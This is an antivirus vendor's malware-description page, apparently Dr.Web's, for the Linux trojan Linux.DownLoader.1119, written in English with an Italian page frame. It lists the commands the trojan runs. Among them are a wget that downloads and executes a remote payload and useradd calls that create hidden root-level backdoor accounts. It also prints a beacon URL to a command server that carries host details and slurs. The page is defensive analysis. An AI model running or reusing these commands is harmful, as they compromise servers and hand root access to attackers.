Per il corretto funzionamento del sito, è necessario attivare il supporto di JavaScript nel browser.
Linux.DownLoader.1119
Aggiunto al database dei virus Dr.Web:
2019-06-14
La descrizione è stata aggiunta:
2019-06-14
Technical Information
Malicious functions:
Removes itself
Launches processes:
bash
wget -q http://thebestperlscripts.cf/.../os -O protections
chmod 777 protections
./protections
tr -d ./
clear
useradd -o -u 0 -g 0 -M -d /root -s /bin/bash system
useradd -o -u 0 -g 0 -M -d /root -s /bin/bash os
nscd -i passwd
nscd -i group
passwd system
passwd os
grep -Ew #Port|Port /etc/ssh/sshd_config
head -n1
awk {print $2}
lsb_release -d
awk {$1= \"\"; print $0}
nproc --all
free -mt
grep Total:
wget -qO- http://5.135.9.132/WelcomeNewBotBuddy/OwO.php?HOLETOFUCK=22&OSCHECKNIGNOG=DUBIUNTUBITCH&RUNNINGOS= Debian GNU/Linux 8.3 (jessie)&TOTALCPU=1&TOTALRAM=959&HOWTFELSEDOIGETIN=PwzLetMeInYourServerSoWeCanFuckSenpaiCodeAbuse
Performs operations with the file system:
Modifies file access rights:
/root/protections
/etc/passwd+
/etc/shadow+
/etc/subuid+
/etc/subgid+
/etc/nshadow
Creates symlinks:
/etc/passwd.lock
/etc/group.lock
/etc/gshadow.lock
/etc/subuid.lock
/etc/subgid.lock
/etc/shadow.lock
Creates or modifies files:
/root/protections
/etc/.pwd.lock
/etc/passwd.720
/etc/group.720
/etc/gshadow.720
/etc/subuid.720
/etc/subgid.720
/etc/shadow.720
/etc/passwd-
/etc/passwd+
/etc/shadow-
/etc/shadow+
/etc/subuid-
/etc/subuid+
/etc/subgid-
/etc/subgid+
/etc/passwd.724
/etc/group.724
/etc/gshadow.724
/etc/subuid.724
/etc/subgid.724
/etc/shadow.724
/etc/nshadow
Deletes files:
/etc/passwd.720
/etc/group.720
/etc/gshadow.720
/etc/subuid.720
/etc/subgid.720
/etc/shadow.720
/etc/shadow.lock
/etc/passwd.lock
/etc/group.lock
/etc/gshadow.lock
/etc/subuid.lock
/etc/subgid.lock
/etc/passwd.724
/etc/group.724
/etc/gshadow.724
/etc/subuid.724
/etc/subgid.724
/etc/shadow.724
Network activity:
Establishes connection:
HTTP GET requests:
th#######rlscripts.cf/.../os
http://#.###.#.##########################.#####################HECKNIGNOG=DUBIUNTUBITCH&RUNNINGOS=%20Debian%20GNU/Linux%208.3%20(jessie)&TOTALCPU=1&TOTALRAM=959&HOWTFELSEDOIGETIN=PwzLetMeInYourServerSoWeCanFuckSenpaiCodeAbuse
DNS ASK:
Other:
Collects CPU information
Collects RAM information
Curing recommendations
Linux
Free trial
One month (no registration) or three months (registration and renewal discount)
Scaricate Dr.Web per Android
Gratis per 3 mesi
Tutti i componenti di protezione
Rinnovo versione di prova tramite AppGallery/Google Pay
Continuando a utilizzare questo sito, l'utente acconsente al nostro utilizzo di file Cookie e di altre tecnologie per la raccolta di informazioni statistiche sui visitatori. Per maggiori informazioni
OK